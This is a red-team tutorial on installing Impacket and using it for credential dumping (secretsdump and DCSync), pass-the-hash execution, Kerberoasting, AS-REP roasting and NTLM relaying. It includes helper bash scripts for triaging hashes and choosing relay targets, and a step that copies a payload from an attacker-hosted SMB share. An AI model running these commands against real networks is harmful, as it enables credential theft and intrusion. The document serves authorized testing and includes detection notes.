Greetings, fellow hackers and pen testers! In this article I’ll walk you through installing Impacket, a powerful and widely used Python library for working with network protocols. Impacket is a must-have for any red teamer or pen tester: it provides a wealth of functionality for interacting with Windows networks, abusing protocol features and misconfigurations, and more. By the end of this article you will be able to install Impacket cleanly on your machine and start using it in your next engagement.

What is Impacket?

Before we dive into the installation process, let’s take a quick look at Impacket and its capabilities. Impacket is a collection of Python classes and example scripts for working with network protocols commonly found in Windows environments (SMB, MSRPC, Kerberos, NTLM, and more). It enables tasks like authentication, enumeration, remote command execution, credential extraction, and relaying in authorized testing scenarios.

Impacket includes several useful tools and utilities, including:

  • smbclient.py: An SMB client for interacting with shares and performing file operations
  • samrdump.py: A tool for enumerating users and groups via the SAMR RPC interface
  • wmiexec.py: A semi-interactive command execution approach using WMI
  • psexec.py: Remote command execution via SMB and the Windows Service Control Manager (SCM)
  • secretsdump.py: Credential material extraction from the SAM, LSA secrets and the NTDS.dit (Active Directory database)
  • GetUserSPNs.py / GetNPUsers.py: Kerberos service-ticket requests for accounts with SPNs (Kerberoasting) and AS-REP requests for accounts without pre-authentication (AS-REP roasting), both for offline cracking

These tools can be incredibly useful in various situations, from performing recon on a network to gaining remote access to a compromised system. With that in mind, let’s get started with the installation process.

Installing Impacket: The Professional Way

Step 1: Install Python and pip

Before installing Impacket, you’ll need to ensure you have Python and pip installed on your system. Many Linux distributions ship with Python 3, but macOS does not always include python3 by default. To check, open a terminal window and type:

python3 --version

If you see output that looks like Python 3.10.6, you are good to go. Impacket works best with Python 3.8+.

Step 2: The Power of pipx

While you can install Impacket directly into your global Python environment with pip, I strongly advise against it. That leads to “dependency hell”, where different tools demand conflicting versions of the same libraries, and on recent Debian and Ubuntu releases pip will refuse outright, because the system interpreter is marked externally managed (PEP 668).

Instead, use pipx. pipx installs each tool into its own isolated virtual environment but exposes the tool’s commands globally, so the Impacket scripts end up on your PATH without touching anything else. Where pip is locked out as above, install pipx from your distribution’s package manager instead of with pip; the remaining steps are unchanged.

# Install pipx
python3 -m pip install --user pipx
python3 -m pipx ensurepath

# Reload your shell
source ~/.bashrc  # or ~/.zshrc

Step 3: Installing Impacket via pipx

Now, let’s install Impacket properly. Red teamers often want the newest features, so the common habit is to install straight from the GitHub repository. Be aware of what that means: an unpinned git install pulls whatever the default branch contains at that moment, so the code you run has had no release review and can change underneath you the next time you upgrade. If you do not need an unreleased fix, the PyPI release (pipx install impacket) is the calmer choice.

pipx install git+https://github.com/fortra/impacket.git

This command creates a dedicated virtual environment for Impacket, installs its dependencies there, and exposes its console scripts (secretsdump.py, wmiexec.py, ntlmrelayx.py and the rest) on your PATH. You can now run them from anywhere, and nothing else on the system sees their dependencies.

To update it later, simply run:

pipx upgrade impacket

For repeatable tooling during an engagement, pin to a release tag or commit so that a surprise merge cannot change your toolset mid-job, and reinstall with an explicit ref:

pipx install --force git+https://github.com/fortra/impacket.git@<branch-or-commit>

Mastering the Tools: A Deep Dive

Now that you have Impacket installed, let’s examine how to use the most critical tools in the suite.

1. secretsdump.py: The Keys to the Kingdom

secretsdump.py is perhaps the most famous tool in the collection. Given administrative credentials for a host, it extracts secrets remotely without dropping an agent: it works over SMB and RPC, briefly enabling the RemoteRegistry service if it is stopped (and restoring its previous state afterwards) to read the SAM and LSA secrets, and against domain controllers it can speak DRSUAPI directly. The remote registry activity and the service start are exactly what a well-tuned SOC watches for, so think of it as agentless, not invisible.

Key Features:

  • Dumps NTLM hashes from the SAM database.
  • Dumps LSA secrets.
  • Dumps the NTDS.dit (Active Directory database) via DRSUAPI.

Usage Examples:

Dump the local SAM hashes and LSA secrets of a host using an account that is a local administrator there (for a local rather than domain account, drop the DOMAIN/ prefix):

secretsdump.py 'DOMAIN/User:Password@192.168.1.10'

Dump the Domain Controller’s NTDS.dit contents over DRSUAPI (a DCSync attack). This needs an account holding the Replicating Directory Changes and Replicating Directory Changes All rights, which by default means Domain Admins, Enterprise Admins and the domain controllers themselves. -just-dc-ntlm limits the output to NTLM hashes, and -just-dc-user lets you pull a single account (krbtgt being the classic target) instead of the whole directory, which is both faster and far less noisy. Defenders spot DCSync as Event ID 4662 replication access coming from a host that is not a domain controller:

secretsdump.py -just-dc-ntlm 'DOMAIN/DomainAdmin:Password@DC_IP'
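Once secretsdump.py has run, the output is only as useful as your triage of it. The script below is an added example (not part of Impacket) that works on the user:rid:lmhash:nthash::: lines the tool prints: it flags accounts carrying the empty-password NT hash, finds NT hashes shared by several accounts (password reuse, usually the quickest lateral path), and produces a deduplicated list for hashcat -m 1000. The sample dump is constructed and truncated; none of the hashes are real credentials.

```shell
#!/usr/bin/env bash
# Added example: post-process secretsdump.py output. Not part of Impacket.
set -euo pipefail

# NT hash of the empty string; an account showing it has no password set.
EMPTY_NT_HASH="31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in the user:rid:lmhash:nthash::: shape secretsdump.py
# prints for SAM and NTDS entries, plus the non-hash lines it mixes in.
# Truncated and fictional; not real credentials.
SAMPLE_DUMP='[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
CORP\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
CORP\jdoe:1106:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
CORP\asmith:1107:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
CORP\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9f8e7d6c5b4a39281706f5e4d3c2b1a0:::
[*] Dumping LSA Secrets
$MACHINE.ACC:plain_password_hex:0a1b2c3d'

# Keep only genuine hash lines; emit "account:nthash" with the hash lowercased.
nt_pairs() {
    awk -F: 'NF == 7 && $2 ~ /^[0-9]+$/ && length($4) == 32 && $4 ~ /^[0-9a-fA-F]+$/ {
        print $1 ":" tolower($4)
    }'
}

# Accounts whose NT hash is the empty-password hash.
blank_password_accounts() {
    nt_pairs | awk -F: -v empty="$EMPTY_NT_HASH" '$2 == empty { print $1 }'
}

# NT hashes that more than one account shares: "hash:count:user1,user2".
# The empty hash is skipped; it is reuse of "no password", not of a password.
shared_nt_hashes() {
    nt_pairs | awk -F: -v empty="$EMPTY_NT_HASH" '
        $2 != empty {
            count[$2]++
            users[$2] = (users[$2] == "") ? $1 : users[$2] "," $1
        }
        END { for (h in count) if (count[h] > 1) print h ":" count[h] ":" users[h] }' | sort
}

# Unique NT hashes, one per line, ready for: hashcat -m 1000 nt.txt wordlist
hashcat_nt_list() {
    nt_pairs | cut -d: -f2 | sort -u
}

# Demo on the constructed sample. Real use: nt_pairs < secretsdump_output.txt
printf '%s\n' "$SAMPLE_DUMP" | blank_password_accounts
printf '%s\n' "$SAMPLE_DUMP" | shared_nt_hashes
```

The filter deliberately keys on the seven-field shape and a 32-hex-character fourth field rather than on the “[*]” banners, so LSA secret lines, DPAPI keys and warnings fall out without special casing. A shared hash between a service account and a human account, as in the sample, is worth more than any cracked password: the NT hash alone is enough for the pass-the-hash options shown later on this page.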

2. smbserver.py: Instant File Sharing

Need to exfiltrate data or host a payload for a target to download? smbserver.py sets up a lightweight SMB server in seconds.

Usage:

# Share the current directory as "SHARE"
sudo smbserver.py SHARE . -smb2support

On the victim machine you can now pull your files across:

copy \\YOUR_IP\SHARE\payload.exe C:\Windows\Temp\

One gotcha: most modern Windows builds (Windows Server since 2019, and the Enterprise and newer Pro editions of the client) refuse unauthenticated guest access to SMB shares by default, so an open share often fails with an access-denied error. Start smbserver.py with -username and -password as well, map the share first with net use \\YOUR_IP\SHARE <password> /user:<user>, then copy from it.

Pro Tip: smbserver.py also prints the NetNTLMv2 challenge/response of anyone who authenticates to it, so if you can trick a user or service into touching your share you get a crackable hash for free. For sustained capture on a segment, Responder is the dedicated tool; smbserver.py is the quick one-off.

3. wmiexec.py: Stealthy Command Execution

wmiexec.py allows you to execute commands on a remote Windows system using the Windows Management Instrumentation (WMI) protocol. It effectively gives you a semi-interactive shell.

Why use it over PsExec? PsExec-style execution creates and starts a service on the target, which is loud (service-install events and, by default, a binary dropped on ADMIN$). wmiexec.py instead asks WMI (Win32_Process over DCOM) to spawn the process, so no service is created. It is quieter, not silent: by default it writes each command’s output to a file under the ADMIN$ share and reads it back over SMB, which touches disk and leaves an SMB session alongside the DCOM traffic, and a cmd.exe spawned by WmiPrvSE.exe is a standard detection. Pass -nooutput if you do not need the output back and want to avoid the file write.

Usage:

wmiexec.py 'DOMAIN/User:Password@TargetIP'

If you only have the NT hash (Pass-the-Hash), use -hashes LMHASH:NTHASH; the LM half can be left empty, which is why the value below starts with a colon:

wmiexec.py -hashes :NTLM_HASH 'DOMAIN/User@TargetIP'

Advanced Attacks: Kerberos and Relaying

Kerberoasting with GetUserSPNs.py

Kerberoasting is a technique to request Service Tickets (TGS) for service accounts and crack them offline to recover the plaintext password.

Execution:

# Request TGS for all users with SPNs
GetUserSPNs.py 'DOMAIN/User:Password' -dc-ip 192.168.1.5 -request

This writes hashcat-formatted hashes (the $krb5tgs$23$ prefix means RC4, hashcat mode 13100). Save them and crack them, but look at the prefix first: accounts that only support AES come back as $krb5tgs$17$ or $krb5tgs$18$, which crack far more slowly. On the blue side, a burst of Event ID 4769 service-ticket requests with RC4 encryption from a single workstation is the classic Kerberoasting signature.

AS-REP Roasting with GetNPUsers.py

This attack targets users with “Do not require Kerberos preauthentication” enabled. You do not need a valid domain password for this one, just a list of candidate usernames; the KDC hands back an AS-REP encrypted with the user’s key for anyone on the list who has the flag set.

Execution:

GetNPUsers.py 'DOMAIN/' -usersfile users.txt -no-pass -format hashcat -outputfile asreproast.txt

Add -dc-ip <DC address> if the domain name does not resolve from your box. If you do hold valid domain credentials, drop -usersfile and -no-pass, pass DOMAIN/user:password instead and add -request; the script then queries LDAP for every account with the flag set rather than guessing from a list.
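Both of the Kerberos attacks above end with a file of hashes, and the first question is always which hashcat mode each line needs and which accounts are going to be expensive. The script below is an added example, not part of Impacket or hashcat: it sorts GetUserSPNs.py and GetNPUsers.py output by prefix into one file per hashcat mode and calls out AES-only accounts. The sample ticket lines are constructed, with filler hex in place of the real ticket bodies.

```shell
#!/usr/bin/env bash
# Added example: sort Kerberoast / AS-REP roast output by hashcat mode.
# Not part of Impacket. The ticket bodies below are constructed and truncated.
set -euo pipefail

# One line of each shape GetUserSPNs.py / GetNPUsers.py write with hashcat
# formatting. Constructed sample; the hex is filler, not a real ticket.
SAMPLE_TICKETS='$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$0a1b2c3d4e5f6071$8293a4b5c6d7e8f9
$krb5tgs$18$svc_web$CORP.LOCAL$*http/web01.corp.local*$1122334455667788$99aabbccddeeff00
$krb5asrep$23$jdoe@CORP.LOCAL:0f1e2d3c4b5a6978$8796a5b4c3d2e1f0'

# Map the hash prefix to the hashcat mode that cracks it.
#   etype 23 = RC4-HMAC; etypes 17/18 = AES128/AES256 (far slower per guess)
hashcat_mode() {
    case "$1" in
        '$krb5tgs$23$'*)   echo 13100 ;;   # Kerberos 5 TGS-REP etype 23
        '$krb5tgs$17$'*)   echo 19600 ;;   # TGS-REP etype 17 (AES128)
        '$krb5tgs$18$'*)   echo 19700 ;;   # TGS-REP etype 18 (AES256)
        '$krb5asrep$23$'*) echo 18200 ;;   # AS-REP etype 23
        *) return 1 ;;
    esac
}

# Pull the account name out of each format so AES-only accounts can be named.
ticket_account() {
    case "$1" in
        '$krb5tgs$23$*'*)     printf '%s\n' "$1" | cut -d'*' -f2 | cut -d'$' -f1 ;;
        '$krb5tgs$1'[78]'$'*) printf '%s\n' "$1" | cut -d'$' -f4 ;;
        '$krb5asrep$23$'*)    printf '%s\n' "$1" | cut -d'$' -f4 | cut -d'@' -f1 ;;
        *) return 1 ;;
    esac
}

# Split stdin into one file per mode under $1 and print "file count" lines.
# AES-only accounts are listed on stderr so you know which ones will cost
# real GPU time; unknown lines are reported rather than silently dropped.
split_by_mode() {
    local outdir="$1" line mode f
    mkdir -p "$outdir"
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        if mode="$(hashcat_mode "$line")"; then
            printf '%s\n' "$line" >>"$outdir/mode_$mode.txt"
            case "$mode" in
                19600|19700) echo "AES-only ticket for $(ticket_account "$line") (mode $mode)" >&2 ;;
            esac
        else
            echo "unrecognised line skipped: $line" >&2
        fi
    done
    for f in "$outdir"/mode_*.txt; do
        [ -e "$f" ] || continue
        printf '%s %s\n' "$(basename "$f" .txt)" "$(wc -l <"$f" | tr -d ' ')"
    done
}

# Demo on the constructed sample. Real use: split_by_mode out/ < kerberoast.txt
printf '%s\n' "$SAMPLE_TICKETS" | split_by_mode "$(mktemp -d)"
```

Feed each resulting file to hashcat with the mode in its name (hashcat -m 13100 out/mode_13100.txt wordlist, and so on). Start with the RC4 files: an AES ticket costs thousands of PBKDF2 iterations per guess, so unless the AES-only account is the prize, it goes to the back of the queue.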

NTLM Relaying with ntlmrelayx.py

ntlmrelayx.py is a beast. It listens for incoming NTLM authentication (over SMB, HTTP and more) and, instead of cracking it, forwards the live authentication to other machines to execute commands or dump data as the victim.

Scenario: You are on a local network. You start Responder to poison LLMNR/NBT-NS, but you turn off Responder’s own SMB and HTTP servers so that the poisoned victims land on ntlmrelayx instead.

  1. Pick targets that will accept the relay. A relayed SMB session is rejected by any host that requires SMB signing (domain controllers do by default; workstations usually do not), so build targets.txt from hosts where signing is not required, and never include the host the authentication came from, since reflecting NTLM back to its source has been blocked since MS08-068.
  2. Configure Responder: Edit Responder.conf and set SMB = Off and HTTP = Off.
  3. Start ntlmrelayx:
     ntlmrelayx.py -tf targets.txt -smb2support
  4. Start Responder:
     responder -I eth0

When a victim tries to reach a resource whose name does not exist, Responder answers the broadcast and the victim authenticates to your box. ntlmrelayx takes that authentication and replays it against the machines in targets.txt. If the relayed account is a local administrator on a target, the default action dumps that host’s local SAM hashes for you; add -c to run a command there, -i for an interactive SMB shell, or -socks to keep the relayed sessions open for other tools.
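Building targets.txt is the step that decides whether the relay does anything, so here is the selection done from an nmap scan. This is an added example, not part of Impacket, Responder or nmap: it assumes you scanned with nmap -p445 --script smb2-security-mode and saved the normal (-oN) output, and it relies on the exact wording of that script’s “Message signing …” lines. The scan excerpt below is constructed with fictional addresses.

```shell
#!/usr/bin/env bash
# Added example: build targets.txt for ntlmrelayx.py from an nmap scan.
# Not part of Impacket or Responder. Assumes nmap's normal (-oN) output.
set -euo pipefail

# Constructed excerpt of: nmap -p445 --script smb2-security-mode -oN scan.txt <range>
# Three hosts: a DC that requires signing, a workstation that does not,
# and a legacy box with signing disabled. Fictional addresses.
SAMPLE_SCAN='Nmap scan report for dc01.corp.local (192.168.1.5)
Host is up (0.00032s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 192.168.1.20
Host is up (0.00050s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for 192.168.1.30
Host is up (0.00120s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2:0:2:
|_    Message signing disabled (dangerous, but default)'

# Emit smb://<ip> for every host whose SMB server does not require signing.
# A relayed session to a host that requires signing is simply rejected, so
# those hosts are dropped here instead of wasting the captured authentication.
relay_targets() {
    awk '
        /^Nmap scan report for / { host = $NF; gsub(/[()]/, "", host) }
        /Message signing enabled and required/ { host = ""; next }
        /Message signing/ && host != "" { print "smb://" host; host = "" }
    '
}

# Same list minus the addresses given as arguments: your own box and any host
# whose authentication you expect to capture (NTLM reflection back to the
# source host has been blocked since MS08-068).
relay_targets_excluding() {
    local skip
    skip="$(printf '%s\n' ${1+"$@"})"
    relay_targets | awk -v skip="$skip" '
        BEGIN { n = split(skip, a, "\n"); for (i = 1; i <= n; i++) drop["smb://" a[i]] = 1 }
        !($0 in drop)'
}

# Write the file ntlmrelayx.py -tf expects and print how many targets it holds.
#   write_targets_file scan.txt targets.txt 192.168.1.100
#   ntlmrelayx.py -tf targets.txt -smb2support
write_targets_file() {
    local scan="$1" out="$2"; shift 2
    relay_targets_excluding ${1+"$@"} <"$scan" >"$out"
    wc -l <"$out" | tr -d ' '
}

# Demo on the constructed scan
printf '%s\n' "$SAMPLE_SCAN" | relay_targets
```

The parser only knows SMB; LDAP, HTTP (for example ADCS web enrollment) and MSSQL targets have their own signing and channel-binding rules and are a separate target list. Re-run the scan rather than reusing an old one: a host that has had signing enforced since your last engagement will quietly eat every relay attempt aimed at it.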

Conclusion

Impacket is not just a tool; it’s a framework that underpins modern network penetration testing. Whether you are moving laterally with wmiexec, dumping credentials with secretsdump, or performing Kerberos attacks, Impacket is the engine that drives the red team.

By installing it via pipx, pinning the version you take on an engagement, and understanding the nuances of each tool (including what each one leaves in the logs), you give yourself a stable, powerful platform. Now, go forth and enumerate!

For more information, check out the official Impacket repository: https://github.com/fortra/impacket